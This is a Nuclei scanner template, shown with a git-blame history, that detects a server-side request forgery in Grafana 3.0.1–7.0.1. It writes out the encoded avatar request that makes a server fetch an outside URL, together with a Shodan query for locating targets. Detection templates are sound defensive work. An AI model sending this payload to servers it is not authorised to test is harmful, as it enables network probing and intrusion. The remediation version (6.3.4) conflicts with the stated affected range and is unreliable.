nuclei-templates/http/cves/2020/CVE-2020-13379.yaml

id: CVE-2020-13379

info:
  name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery
  author: Joshua Rogers
  severity: high
  description: |
    Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
    - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192
    - http://www.openwall.com/lists/oss-security/2020/06/03/4
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13379
  remediation: Upgrade to 6.3.4 or higher.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
    cvss-score: 8.2
    cve-id: CVE-2020-13379
    cwe-id: CWE-918
    epss-score: 0.24779
  metadata:
    max-request: 1
    shodan-query: title:"Grafana"
    verified: "true"
  tags: cve,cve2020,grafana,ssrf

http:

  - method: GET
    path:
      - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cloudflare.com"
          - "dns"
        condition: and

      - type: word
        part: header
        words:
          - "image/jpeg"

      - type: status
        status:
          - 200

# Enhanced by md on 2023/04/12
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`id: CVE-2020-13379`

			`info:`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`author: Joshua Rogers`
			`severity: high`
Update CVE-2020-13379.yaml 2022-12-08 05:36:13 +00:00			`description: \|`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`reference:`
			`- https://github.com/advisories/GHSA-wc9w-wvq2-ffm9`
			`- https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192`
Auto Generated CVE annotations [Mon Apr 3 09:07:37 UTC 2023] :robot: 2023-04-03 09:07:37 +00:00			`- http://www.openwall.com/lists/oss-security/2020/06/03/4`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-13379`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`remediation: Upgrade to 6.3.4 or higher.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H`
			`cvss-score: 8.2`
			`cve-id: CVE-2020-13379`
			`cwe-id: CWE-918`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`epss-score: 0.24779`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`shodan-query: title:"Grafana"`
Auto Generated CVE annotations [Mon Apr 3 09:07:37 UTC 2023] :robot: 2023-04-03 09:07:37 +00:00			`verified: "true"`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`tags: cve,cve2020,grafana,ssrf`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update CVE-2020-13379.yaml 2022-12-08 05:29:30 +00:00			`part: body`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`words:`
			`- "cloudflare.com"`
			`- "dns"`
			`condition: and`
Update CVE-2020-13379.yaml 2022-12-08 05:29:30 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- "image/jpeg"`

			`- type: status`
			`status:`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`- 200`

			`# Enhanced by md on 2023/04/12`